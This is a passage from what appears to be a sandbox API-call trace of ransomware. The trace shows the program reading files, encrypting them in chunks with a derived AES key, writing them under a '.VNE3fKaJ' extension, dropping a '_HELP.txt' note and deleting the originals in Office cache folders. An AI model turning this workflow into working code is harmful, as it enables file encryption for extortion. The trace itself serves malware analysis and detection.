dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.136] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.136] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.136] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.137] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.137] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.137] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.138] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.138] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.138] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.139] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.139] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.424] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0120.424] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.424] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.424] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.425] GetFileType (hFile=0x340) returned 0x1 [0120.425] GetLastError () returned 0x0 [0120.425] SetLastError (dwErrCode=0x0) [0120.426] GetLastError () returned 0x0 [0120.426] SetLastError (dwErrCode=0x0) [0120.426] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.426] CloseHandle (hObject=0x340) returned 1 [0120.427] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi")) returned 1 [0120.431] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PowerPointMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointMUI.xml", lpUsedDefaultChar=0x0) returned 18 [0120.431] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0120.431] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.431] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.432] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.432] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.432] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.432] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5aa [0120.432] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.446] CryptDestroyHash (hHash=0x284d528) returned 1 [0120.446] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.446] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.447] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.447] GetFileType (hFile=0x344) returned 0x1 [0120.448] GetLastError () returned 0xb7 [0120.448] SetLastError (dwErrCode=0xb7) [0120.448] GetLastError () returned 0xb7 [0120.448] SetLastError (dwErrCode=0xb7) [0120.448] WriteFile (in: hFile=0x344, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.449] CloseHandle (hObject=0x344) returned 1 [0120.449] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0120.450] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PptLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PptLR.cab", lpUsedDefaultChar=0x0) returned 10 [0120.450] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0120.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x344 [0120.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 